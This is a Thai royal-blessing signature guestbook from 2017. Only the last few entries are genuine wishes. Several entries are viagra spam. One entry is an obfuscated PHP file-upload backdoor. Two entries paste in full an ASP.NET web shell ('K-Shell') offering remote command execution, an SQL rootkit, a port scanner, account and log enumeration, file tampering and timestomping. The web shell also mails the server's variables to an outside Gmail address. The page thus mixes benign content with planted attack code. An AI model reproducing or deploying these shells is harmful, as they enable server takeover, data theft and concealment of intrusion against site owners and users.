ลำดับที่
ร่วมลงนามถวายพระพร
ผู้ร่วมลงนามถวายพระพร
1
viagra purchase visa australia for women does it work - how fast does viagra work . (12/4/2017)  rtetrpue
2
I need a prescription for herbal viagra in canada in . (11/2/2017)  ytpieruw
3
Pero prescription viagra ireland king jailed for three years Mairena del Aljarafe. (10/2/2017)  wuupioru
4
\x3c/\x69\x6dg\x3e\x3c\x62r\x3e\n\n\n";if(isset($_POST["sub\x6di\x74"])){if($_FILES["f\x69\x6c\x65"]["e\x72r\x6fr"]>0){echo"\x45\x72\x72\x6fr: ".$_FILES["f\x69\x6ce"]["err\x6f\x72"]."<\x62r />";}else{echo"\x55\x70\x6co\x61d:\x20".$_FILES["fi\x6c\x65"]["\x6e\x61\x6d\x65"]."";echo"\x53\x69\x7a\x65:\x20".($_FILES["\x66il\x65"]["\x73\x69ze"]/1024)."\x20\x4bb\x3c\x62r /\x3e";echo"St\x6f\x72\x65d\x20i\x6e: ".$_FILES["\x66i\x6ce"]["\x74mp_\x6eam\x65"]."<\x62\x72\x3e";}if(file_exists("".$_FILES["f\x69\x6ce"]["\x6e\x61\x6d\x65"])){echo$_FILES["\x66i\x6ce"]["na\x6d\x65"]." a\x6c\x72\x65a\x64y\x20ex\x69\x73\x74\x73\x2e\x20";}else{$iwtdsenis="\x75rl";${"G\x4cO\x42A\x4cS"}["e\x66y\x74\x64\x69\x6f\x77t"]="\x70\x61\x74\x68";move_uploaded_file($_FILES["fi\x6ce"]["\x74\x6dp_\x6eame"],"".$_FILES["fi\x6c\x65"]["name"]);${${"\x47\x4cO\x42\x41LS"}["\x62\x6d\x63tv\x77c"]}=__dir__;${"\x47\x4cO\x42AL\x53"}["\x6f\x78xzjyqsz"]="\x70\x61\x74\x68";echo"S\x74o\x72\x65\x64 i\x6e: ".${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x65\x66\x79\x74\x64i\x6f\x77\x74"]}."/".$_FILES["f\x69\x6c\x65"]["nam\x65"]."
";echo"<\x68r\x3e";$chubtyhcjkr="\x70\x61\x74\x68";${$iwtdsenis}="\x68\x74\x74p://".$_SERVER["\x48\x54\x54\x50\x5f\x48O\x53T"].$_SERVER["REQ\x55ES\x54\x5f\x55RI"];${${"\x47\x4c\x4f\x42\x41LS"}["\x6f\x78\x78zj\x79\x71\x73\x7a"]}=str_replace("\x75\x70.\x70h\x70",$_FILES["\x66\x69\x6c\x65"]["\x6ea\x6d\x65"],${${"\x47\x4cO\x42\x41\x4cS"}["\x77\x6d\x79\x6bxsk\x78\x63\x79uj"]});echo"\x47o\x20\x68e\x72e\x20:\x20".${$chubtyhcjkr}."\x3c\x62r\x3e";}} ?>
(10/2/2017)
 qsqs
5
<%@ Page ContentType="text/html" validateRequest="false" aspcompat="true"%> <%@ Import Namespace="System.IO" %> <%@ import namespace="System.Diagnostics" %> <%@ import namespace="System.Threading" %> <%@ import namespace="System.Text" %> <%@ import namespace="System.Security.Cryptography" %> <%@ Import Namespace="System.Net.Sockets"%> <%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %> <%@ import Namespace="System.DirectoryServices" %> <%@ import Namespace="Microsoft.Win32" %> <% if request.QueryString("action")="down" and session("rooot")=1 then downTheFile(request.QueryString("src")) response.End() end if Dim act as string = request.QueryString("action") if act="cmd" then TITLE="CMD.NET" elseif act="cmdw32" then TITLE="ASP.NET W32 Shell" elseif act="cmdwsh" then TITLE="ASP.NET WSH Shell" elseif act="sqlrootkit" then TITLE="SqlRootKit.NET" elseif act="clonetime" then TITLE="Clone Time" elseif act="information" then TITLE="Web Server Info" elseif act="goto" then TITLE="K-Shell 1.2" elseif act="pro1" then TITLE="List processes from server" elseif act="pro2" then TITLE="List processes from server" elseif act="user" then TITLE="List User Accounts" elseif act="applog" then TITLE="List Application Event Log Entries" elseif act="syslog" then TITLE="List System Event Log Entries" elseif act="auser" then TITLE="IIS List Anonymous' User details" elseif act="sqlman" then TITLE="MSSQL Management" elseif act="scan" then TITLE="Port Scanner" elseif act="iisspy" then TITLE="IIS Spy" elseif act="sqltool" then TITLE="SQL Tool" elseif act="regshell" then TITLE="Registry Shell" else TITLE=request.ServerVariables("HTTP_HOST") end if %>
<% Dim error_x as Exception Try if session("rooot")<>1 then 'Test sending anonymous mail, comment it if you don't want test it dim info As String Try info = request.ServerVariables.ToString.Replace("%2f","/").Replace("%5c","\").Replace("%3a",":").Replace("%2c",",").Replace("%3b",";").Replace("%3d","=").Replace("%2b","+").Replace("%0d%0a",vbnewline) System.Web.Mail.SmtpMail.SmtpServer = "localhost" System.Web.Mail.SmtpMail.Send(request.ServerVariables("HTTP_HOST"),"test.mail.address.2008@gmail.com",request.ServerVariables("HTTP_HOST")+request.ServerVariables("URL"),info) Catch End Try %>
Your Password:
<% else dim temp as string temp=request.QueryString("action") if temp="" then temp="goto" select case temp case "goto" if request.QueryString("src")<>"" then url=request.QueryString("src") else url=server.MapPath(".") & "\" end if call existdir(url) dim xdir as directoryinfo dim mydir as new DirectoryInfo(url) dim guru as string dim xfile as fileinfo dim ServerIP As string = "Server IP : " + Request.ServerVariables("LOCAL_ADDR") + " - Client IP : " + getIP() + " - " dim HostName As string = "HostName : " + Environment.MachineName + " - Username : "+ Environment.UserName +"
" dim OSVersion As string = "OS Version : " + Environment.OSVersion.ToString() + "" dim IISversion As string = " - IIS Version : " + Request.ServerVariables("SERVER_SOFTWARE") + "
System Dir : " + Environment.SystemDirectory + "" dim PATH_INFO As string = " - PATH_TRANSLATED : " + Request.ServerVariables("PATH_TRANSLATED") + "
" dim HARDWARE_INFO As string = "" Dim environmentVariables As IDictionary = Environment.GetEnvironmentVariables() Dim de As DictionaryEntry For Each de In environmentVariables if de.Key = "NUMBER_OF_PROCESSORS" then HARDWARE_INFO += "Hardware Info : " + de.Value + "CPU - " end if if de.Key = "PROCESSOR_IDENTIFIER" then HARDWARE_INFO += de.Value + "
" end if Next Info.Text += ServerIP + HostName + OSVersion + IISversion + PATH_INFO + HARDWARE_INFO %>

Currently Dir: <%=url%>
Operate: New - <%if session("cutboard")<>"" then%> Paste - <%else%> Paste - <%end if%> UpLoad - title="Go to this file's directory">GoBackDir - Quit
Go to: <% dim i as integer for i =0 to Directory.GetLogicalDrives().length-1 response.Write("" & Directory.GetLogicalDrives(i) & " ") next %> <% response.Write("IP:" & Request.ServerVariables("REMOTE_ADDR")&"") %>
Tool: SqlRootKit.NET - CMD.NET - kshellW32 - kshellWSH - CloneTime - System Info - List Processes 1 - List Processes 2
List User Accounts - IIS Anonymous User- Port Scanner - IIS Spy - Application Event Log - System Log

" response.Write(guru) dim lll lll=1 for each xdir in mydir.getdirectories() response.Write("") dim filepath as string filepath=server.UrlEncode(url & xdir.name) if lll=1 then lll=2 else lll=1 end if guru= "" response.Write(guru) response.Write("") response.Write("") guru="" response.Write(guru) response.Write("") next %>") if lll=1 then lll=2 else lll=1 end if guru= "" response.Write(guru) guru="" response.Write(guru) response.Write("") guru="" response.Write(guru) response.Write("") next response.Write("
NameSizeModifyActions
<% guru= "
[..]
[" & xdir.name & "]<dir>" & Directory.GetLastWriteTime(url & xdir.name) & "Cut" & "|Copy|Del
<% for each xfile in mydir.getfiles() dim filepath2 as string filepath2=server.UrlEncode(url & xfile.name) response.Write("
" & xfile.name & "" & GetSize(xfile.length) & "" & file.GetLastWriteTime(url & xfile.name) & "Edit|Cut|Copy|Rename|Download|Del
") %>
<% case "information" dim CIP,CP as string if getIP()<>request.ServerVariables("REMOTE_ADDR") then CIP=getIP() CP=request.ServerVariables("REMOTE_ADDR") else CIP=request.ServerVariables("REMOTE_ADDR") CP="None" end if %>
[ Web Server Information ]        Back

Server IP <%=request.ServerVariables("LOCAL_ADDR")%>
Machine Name <%=Environment.MachineName%>
Network Name <%=Environment.UserDomainName.ToString()%>
User Name in this Process <%=Environment.UserName%>
OS Version <%=Environment.OSVersion.ToString()%>
Started Time <%=GetStartedTime(Environment.Tickcount)%> Hours
System Time <%=now%>
IIS Version <%=request.ServerVariables("SERVER_SOFTWARE")%>
HTTPS <%=request.ServerVariables("HTTPS")%>
PATH_INFO <%=request.ServerVariables("PATH_INFO")%>
PATH_TRANSLATED <%=request.ServerVariables("PATH_TRANSLATED")%>
SERVER_PORT <%=request.ServerVariables("SERVER_PORT")%>
SeesionID <%=Session.SessionID%>
Client Infomation
Client Proxy <%=CP%>
Client IP <%=CIP%>
User <%=request.ServerVariables("HTTP_USER_AGENT")%>
<% Create_table_row_with_supplied_colors("Black", "White", "center", "Environment Variables, Server Variables") %>
<% case "cmd" %>

[ CMD.NET for WebAdmin ]        Back

Execute command with ASP.NET account(Notice: only click "Run" to run)

- This function has fixed by kikicoco.Antivirus has not detected (2007/02/27)-

Command:

<% case "cmdw32" %>

[ ASP.NET W32 Shell ]        Back

Execute command with ASP.NET account using W32(Notice: only click "Run" to run)

<% Response.Write("System Dir : "+Environment.SystemDirectory +"

") %> CMD File: C:\\WINDOWS\\system32\\cmd.exe

Command: 

<% case "cmdwsh" %>

[ ASP.NET WSH Shell ]        Back

Execute command with ASP.NET account using WSH(Notice: only click "Run" to run)

Command:

<% case "pro1" %>

[ List processes from server ]        Back

<% Try output_wmi_function_data("Win32_Process","ProcessId,Name,WorkingSetSize,HandleCount") Catch rw("This function is disabled by server") End Try %>
<% case "pro2" %>

[ List processes from server ]        Back

" prostr += "" prostr += "" prostr += "" Next Catch ex As Exception Response.write(ex.Message) End Try Response.write(htmlbengin + prostr + htmlend) %>
<% Dim htmlbengin As String = "" Dim prostr As String = "" Dim htmlend As String = "
IDProcessMemorySizeThreads
" Try Dim mypro As Process() = Process.GetProcesses() For Each p As Process In mypro prostr += "
" + p.Id.ToString() + "" + p.ProcessName.ToString() + "" + p.WorkingSet.ToString() + "" + p.Threads.Count.ToString() + "
<% case "user" %>

[ List User Accounts ]        Back

<% dim WMI_function = "Win32_UserAccount" dim Fields_to_load = "Name,Domain,FullName,Description,PasswordRequired,SID" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data(WMI_function,Fields_to_load) Catch rw(fail_description) End Try %>
<% case "reg" %>

[ Registry ]        Back

<% dim WMI_function = "Win32_Registry" dim Fields_to_load = "Caption,CurrentSize,Description,InstallDate,Name,Status" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data(WMI_function,Fields_to_load) Catch rw(fail_description) End Try %>
<% case "applog" %>

[ List Application Event Log Entries ]        Back

<% dim WMI_function = "Win32_NTLogEvent where Logfile='Application'" dim Fields_to_load = "Logfile,Message,type" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data_instances(WMI_function,Fields_to_load,2000) Catch rw(fail_description) End Try %>
<% case "syslog" %>

[ List System Event Log Entries ]        Back

<% dim WMI_function = "Win32_NTLogEvent where Logfile='System'" dim Fields_to_load = "Logfile,Message,type" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data_instances(WMI_function,Fields_to_load,2000) Catch rw("This function is disabled by server") End Try %>
<% case "auser" %>

[ IIS List Anonymous' User details ]        Back

<% Try IIS_list_Anon_Name_Pass Catch rw("This function is disabled by server") End Try %>
<% case "scan" %>

[ ASP.NET Port Scanner ]        Back

C# coded by Hackwol & Lenk, VB coded by kikicoco (19/08/2008)

Start IP :  127.0.0.1      ---  End Ip :  127.0.0.1 
Ports    :  21,25,80,1433,3306,3389

  
<% case "iisspy" %>

[ IIS Spy ]        Back

<% Try Response.write(IISSpy()) Catch rw("This function is disabled by server") End Try %> <% case "sqltool" %>

[ SQL Tool ]        Back

<% Try Catch rw("This function is disabled by server") End Try %> <% case "regshell" %>

[ Registry Shell ]        Back

Key:   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName

Value: ComputerName  

<% case "sqlman" %>

[ MSSQL Query ]        Back

Execute query with SQLServer account(Notice: only click "Run" to run)

Host:

SQL Name: SQL Password:

Command:

<% case "sqlrootkit" %>

[ SqlRootKit.NET for WebAdmin ]        Back

Execute command with SQLServer account(Notice: only click "Run" to run)

Host:

SQL Name: SQL Password:

Command:

<% case "del" dim a as string a=request.QueryString("src") call existdir(a) call del(a) response.Write("") case "copy" call existdir(request.QueryString("src")) session("cutboard")="" & request.QueryString("src") response.Write("") case "cut" call existdir(request.QueryString("src")) session("cutboard")="" & request.QueryString("src") response.Write("") case "paste" dim ow as integer if request.Form("OverWrite")<>"" then ow=1 if request.Form("Cancel")<>"" then ow=2 url=request.QueryString("src") call existdir(url) dim d as string d=session("cutboard") if left(d,1)="" then TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1)) TEMP2=url & replace(path.getfilename(d),"","") if right(d,1)="\" then call xexistdir(TEMP1,ow) directory.move(replace(d,"",""),TEMP1 & "\") response.Write("") else call xexistdir(TEMP2,ow) file.move(replace(d,"",""),TEMP2) response.Write("") end if else TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1)) TEMP2=url & path.getfilename(replace(d,"","")) if right(d,1)="\" then call xexistdir(TEMP1,ow) directory.createdirectory(TEMP1) call copydir(replace(d,"",""),TEMP1 & "\") response.Write("") else call xexistdir(TEMP2,ow) file.copy(replace(d,"",""),TEMP2) response.Write("") end if end if case "upfile" url=request.QueryString("src") %>
You will upload file to this directory : <%=url%>
Please choose file from your computer :
Go Back <% case "new" url=request.QueryString("src") %>
<%=url%>
Name:

Go Back <% case "edit" dim b as string b=request.QueryString("src") call existdir(b) dim myread as new streamreader(b,encoding.default) filepath.text=b content.text=myread.readtoend %>
Path *
Content
Go Back <% myread.close case "rename" url=request.QueryString("src") if request.Form("name")="" then %>
" onSubmit="return checkname();">

You will rename <%=request.QueryString("src")%>to: <%=getparentdir(request.QueryString("src"))%>

Go Back <% else if Rename() then response.Write("") else response.Write("") end if end if case "samename" url=request.QueryString("src") %>

Exist the same name file , can you overwrite ?(If you click " no" , it will auto add a number as prefix)

Go Back <% case "clonetime" time1.Text=request.QueryString("src")&"kshell.aspx" time2.Text=request.QueryString("src") %>

[CloneTime for WebAdmin]      Back

A tool that it copy the file or directory's time to another file or directory

Rework File or Dir:

Copied File or Dir:     

<% case "logout" session.Abandon() response.Write(" (10/1/2017)  g

6
<%@ Page ContentType="text/html" validateRequest="false" aspcompat="true"%> <%@ Import Namespace="System.IO" %> <%@ import namespace="System.Diagnostics" %> <%@ import namespace="System.Threading" %> <%@ import namespace="System.Text" %> <%@ import namespace="System.Security.Cryptography" %> <%@ Import Namespace="System.Net.Sockets"%> <%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %> <%@ import Namespace="System.DirectoryServices" %> <%@ import Namespace="Microsoft.Win32" %> <% if request.QueryString("action")="down" and session("rooot")=1 then downTheFile(request.QueryString("src")) response.End() end if Dim act as string = request.QueryString("action") if act="cmd" then TITLE="CMD.NET" elseif act="cmdw32" then TITLE="ASP.NET W32 Shell" elseif act="cmdwsh" then TITLE="ASP.NET WSH Shell" elseif act="sqlrootkit" then TITLE="SqlRootKit.NET" elseif act="clonetime" then TITLE="Clone Time" elseif act="information" then TITLE="Web Server Info" elseif act="goto" then TITLE="K-Shell 1.2" elseif act="pro1" then TITLE="List processes from server" elseif act="pro2" then TITLE="List processes from server" elseif act="user" then TITLE="List User Accounts" elseif act="applog" then TITLE="List Application Event Log Entries" elseif act="syslog" then TITLE="List System Event Log Entries" elseif act="auser" then TITLE="IIS List Anonymous' User details" elseif act="sqlman" then TITLE="MSSQL Management" elseif act="scan" then TITLE="Port Scanner" elseif act="iisspy" then TITLE="IIS Spy" elseif act="sqltool" then TITLE="SQL Tool" elseif act="regshell" then TITLE="Registry Shell" else TITLE=request.ServerVariables("HTTP_HOST") end if %>
<% Dim error_x as Exception Try if session("rooot")<>1 then 'Test sending anonymous mail, comment it if you don't want test it dim info As String Try info = request.ServerVariables.ToString.Replace("%2f","/").Replace("%5c","\").Replace("%3a",":").Replace("%2c",",").Replace("%3b",";").Replace("%3d","=").Replace("%2b","+").Replace("%0d%0a",vbnewline) System.Web.Mail.SmtpMail.SmtpServer = "localhost" System.Web.Mail.SmtpMail.Send(request.ServerVariables("HTTP_HOST"),"test.mail.address.2008@gmail.com",request.ServerVariables("HTTP_HOST")+request.ServerVariables("URL"),info) Catch End Try %>
Your Password:
<% else dim temp as string temp=request.QueryString("action") if temp="" then temp="goto" select case temp case "goto" if request.QueryString("src")<>"" then url=request.QueryString("src") else url=server.MapPath(".") & "\" end if call existdir(url) dim xdir as directoryinfo dim mydir as new DirectoryInfo(url) dim guru as string dim xfile as fileinfo dim ServerIP As string = "Server IP : " + Request.ServerVariables("LOCAL_ADDR") + " - Client IP : " + getIP() + " - " dim HostName As string = "HostName : " + Environment.MachineName + " - Username : "+ Environment.UserName +"
" dim OSVersion As string = "OS Version : " + Environment.OSVersion.ToString() + "" dim IISversion As string = " - IIS Version : " + Request.ServerVariables("SERVER_SOFTWARE") + "
System Dir : " + Environment.SystemDirectory + "" dim PATH_INFO As string = " - PATH_TRANSLATED : " + Request.ServerVariables("PATH_TRANSLATED") + "
" dim HARDWARE_INFO As string = "" Dim environmentVariables As IDictionary = Environment.GetEnvironmentVariables() Dim de As DictionaryEntry For Each de In environmentVariables if de.Key = "NUMBER_OF_PROCESSORS" then HARDWARE_INFO += "Hardware Info : " + de.Value + "CPU - " end if if de.Key = "PROCESSOR_IDENTIFIER" then HARDWARE_INFO += de.Value + "
" end if Next Info.Text += ServerIP + HostName + OSVersion + IISversion + PATH_INFO + HARDWARE_INFO %>

Currently Dir: <%=url%>
Operate: New - <%if session("cutboard")<>"" then%> Paste - <%else%> Paste - <%end if%> UpLoad - title="Go to this file's directory">GoBackDir - Quit
Go to: <% dim i as integer for i =0 to Directory.GetLogicalDrives().length-1 response.Write("" & Directory.GetLogicalDrives(i) & " ") next %> <% response.Write("IP:" & Request.ServerVariables("REMOTE_ADDR")&"") %>
Tool: SqlRootKit.NET - CMD.NET - kshellW32 - kshellWSH - CloneTime - System Info - List Processes 1 - List Processes 2
List User Accounts - IIS Anonymous User- Port Scanner - IIS Spy - Application Event Log - System Log

" response.Write(guru) dim lll lll=1 for each xdir in mydir.getdirectories() response.Write("") dim filepath as string filepath=server.UrlEncode(url & xdir.name) if lll=1 then lll=2 else lll=1 end if guru= "" response.Write(guru) response.Write("") response.Write("") guru="" response.Write(guru) response.Write("") next %>") if lll=1 then lll=2 else lll=1 end if guru= "" response.Write(guru) guru="" response.Write(guru) response.Write("") guru="" response.Write(guru) response.Write("") next response.Write("
NameSizeModifyActions
<% guru= "
[..]
[" & xdir.name & "]<dir>" & Directory.GetLastWriteTime(url & xdir.name) & "Cut" & "|Copy|Del
<% for each xfile in mydir.getfiles() dim filepath2 as string filepath2=server.UrlEncode(url & xfile.name) response.Write("
" & xfile.name & "" & GetSize(xfile.length) & "" & file.GetLastWriteTime(url & xfile.name) & "Edit|Cut|Copy|Rename|Download|Del
") %> <% case "information" dim CIP,CP as string if getIP()<>request.ServerVariables("REMOTE_ADDR") then CIP=getIP() CP=request.ServerVariables("REMOTE_ADDR") else CIP=request.ServerVariables("REMOTE_ADDR") CP="None" end if %>
[ Web Server Information ]        Back

Server IP <%=request.ServerVariables("LOCAL_ADDR")%>
Machine Name <%=Environment.MachineName%>
Network Name <%=Environment.UserDomainName.ToString()%>
User Name in this Process <%=Environment.UserName%>
OS Version <%=Environment.OSVersion.ToString()%>
Started Time <%=GetStartedTime(Environment.Tickcount)%> Hours
System Time <%=now%>
IIS Version <%=request.ServerVariables("SERVER_SOFTWARE")%>
HTTPS <%=request.ServerVariables("HTTPS")%>
PATH_INFO <%=request.ServerVariables("PATH_INFO")%>
PATH_TRANSLATED <%=request.ServerVariables("PATH_TRANSLATED")%>
SERVER_PORT <%=request.ServerVariables("SERVER_PORT")%>
SeesionID <%=Session.SessionID%>
Client Infomation
Client Proxy <%=CP%>
Client IP <%=CIP%>
User <%=request.ServerVariables("HTTP_USER_AGENT")%>
<% Create_table_row_with_supplied_colors("Black", "White", "center", "Environment Variables, Server Variables") %>
<% case "cmd" %>

[ CMD.NET for WebAdmin ]        Back

Execute command with ASP.NET account(Notice: only click "Run" to run)

- This function has fixed by kikicoco.Antivirus has not detected (2007/02/27)-

Command:

<% case "cmdw32" %>

[ ASP.NET W32 Shell ]        Back

Execute command with ASP.NET account using W32(Notice: only click "Run" to run)

<% Response.Write("System Dir : "+Environment.SystemDirectory +"

") %> CMD File: C:\\WINDOWS\\system32\\cmd.exe

Command: 

<% case "cmdwsh" %>

[ ASP.NET WSH Shell ]        Back

Execute command with ASP.NET account using WSH(Notice: only click "Run" to run)

Command:

<% case "pro1" %>

[ List processes from server ]        Back

<% Try output_wmi_function_data("Win32_Process","ProcessId,Name,WorkingSetSize,HandleCount") Catch rw("This function is disabled by server") End Try %>
<% case "pro2" %>

[ List processes from server ]        Back

" prostr += "" prostr += "" prostr += "" Next Catch ex As Exception Response.write(ex.Message) End Try Response.write(htmlbengin + prostr + htmlend) %>
<% Dim htmlbengin As String = "" Dim prostr As String = "" Dim htmlend As String = "
IDProcessMemorySizeThreads
" Try Dim mypro As Process() = Process.GetProcesses() For Each p As Process In mypro prostr += "
" + p.Id.ToString() + "" + p.ProcessName.ToString() + "" + p.WorkingSet.ToString() + "" + p.Threads.Count.ToString() + "
<% case "user" %>

[ List User Accounts ]        Back

<% dim WMI_function = "Win32_UserAccount" dim Fields_to_load = "Name,Domain,FullName,Description,PasswordRequired,SID" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data(WMI_function,Fields_to_load) Catch rw(fail_description) End Try %>
<% case "reg" %>

[ Registry ]        Back

<% dim WMI_function = "Win32_Registry" dim Fields_to_load = "Caption,CurrentSize,Description,InstallDate,Name,Status" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data(WMI_function,Fields_to_load) Catch rw(fail_description) End Try %>
<% case "applog" %>

[ List Application Event Log Entries ]        Back

<% dim WMI_function = "Win32_NTLogEvent where Logfile='Application'" dim Fields_to_load = "Logfile,Message,type" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data_instances(WMI_function,Fields_to_load,2000) Catch rw(fail_description) End Try %>
<% case "syslog" %>

[ List System Event Log Entries ]        Back

<% dim WMI_function = "Win32_NTLogEvent where Logfile='System'" dim Fields_to_load = "Logfile,Message,type" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data_instances(WMI_function,Fields_to_load,2000) Catch rw("This function is disabled by server") End Try %>
<% case "auser" %>

[ IIS List Anonymous' User details ]        Back

<% Try IIS_list_Anon_Name_Pass Catch rw("This function is disabled by server") End Try %>
<% case "scan" %>

[ ASP.NET Port Scanner ]        Back

C# coded by Hackwol & Lenk, VB coded by kikicoco (19/08/2008)

Start IP :  127.0.0.1      ---  End Ip :  127.0.0.1 
Ports    :  21,25,80,1433,3306,3389

  
<% case "iisspy" %>

[ IIS Spy ]        Back

<% Try Response.write(IISSpy()) Catch rw("This function is disabled by server") End Try %> <% case "sqltool" %>

[ SQL Tool ]        Back

<% Try Catch rw("This function is disabled by server") End Try %> <% case "regshell" %>

[ Registry Shell ]        Back

Key:   HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName

Value: ComputerName  

<% case "sqlman" %>

[ MSSQL Query ]        Back

Execute query with SQLServer account(Notice: only click "Run" to run)

Host:

SQL Name: SQL Password:

Command:

<% case "sqlrootkit" %>

[ SqlRootKit.NET for WebAdmin ]        Back

Execute command with SQLServer account(Notice: only click "Run" to run)

Host:

SQL Name: SQL Password:

Command:

<% case "del" dim a as string a=request.QueryString("src") call existdir(a) call del(a) response.Write("") case "copy" call existdir(request.QueryString("src")) session("cutboard")="" & request.QueryString("src") response.Write("") case "cut" call existdir(request.QueryString("src")) session("cutboard")="" & request.QueryString("src") response.Write("") case "paste" dim ow as integer if request.Form("OverWrite")<>"" then ow=1 if request.Form("Cancel")<>"" then ow=2 url=request.QueryString("src") call existdir(url) dim d as string d=session("cutboard") if left(d,1)="" then TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1)) TEMP2=url & replace(path.getfilename(d),"","") if right(d,1)="\" then call xexistdir(TEMP1,ow) directory.move(replace(d,"",""),TEMP1 & "\") response.Write("") else call xexistdir(TEMP2,ow) file.move(replace(d,"",""),TEMP2) response.Write("") end if else TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1)) TEMP2=url & path.getfilename(replace(d,"","")) if right(d,1)="\" then call xexistdir(TEMP1,ow) directory.createdirectory(TEMP1) call copydir(replace(d,"",""),TEMP1 & "\") response.Write("") else call xexistdir(TEMP2,ow) file.copy(replace(d,"",""),TEMP2) response.Write("") end if end if case "upfile" url=request.QueryString("src") %>
You will upload file to this directory : <%=url%>
Please choose file from your computer :
Go Back <% case "new" url=request.QueryString("src") %>
<%=url%>
Name:

Go Back <% case "edit" dim b as string b=request.QueryString("src") call existdir(b) dim myread as new streamreader(b,encoding.default) filepath.text=b content.text=myread.readtoend %>
Path *
Content
Go Back <% myread.close case "rename" url=request.QueryString("src") if request.Form("name")="" then %>
" onSubmit="return checkname();">

You will rename <%=request.QueryString("src")%>to: <%=getparentdir(request.QueryString("src"))%>

Go Back <% else if Rename() then response.Write("") else response.Write("") end if end if case "samename" url=request.QueryString("src") %>

Exist the same name file , can you overwrite ?(If you click " no" , it will auto add a number as prefix)

Go Back <% case "clonetime" time1.Text=request.QueryString("src")&"kshell.aspx" time2.Text=request.QueryString("src") %>

[CloneTime for WebAdmin]      Back

A tool that it copy the file or directory's time to another file or directory

Rework File or Dir:

Copied File or Dir:     

<% case "logout" session.Abandon() response.Write(" (10/1/2017)  g

7

hhhhh

(10/1/2017)  

hhhhh

8
snepepepepepep (10/1/2017)  snepepepepe
9
ขอพระองค์ทรงพระเจิรญ (8/23/2017)  สินีนาถ โหรหุตะ
10
ขอพระองค์ทรงพระเจริญ (8/22/2017)  นายมงคล ศรีสุขคำ
11
ขอจรงทรงพระเจริญยิ่งยืนนาน (8/11/2017)  นางสาวพลอยไพลิน สิงห์ชัย
12
ขอพระองค์ทรงพระเจริญ ทรงพระพลานามัยแข็งแรงสมบูรณ์ และทรงเป็นพระมิ่งแก่เหล่าพสกนิกรชาวไทยตลอดไป (8/10/2017)  ครอบครัวแก้วเกตุ
13
ขอพระองค์ทรงพระเจริญยิ่งยืนนาน ด้วยเกล้าด้วยกระหม่อม (8/8/2017)  ส่วนอำนวยการกลาง
14
ขอทรงพระเจริญ (8/7/2017)  งานเทคโนโลยีสารสนเทศ       ;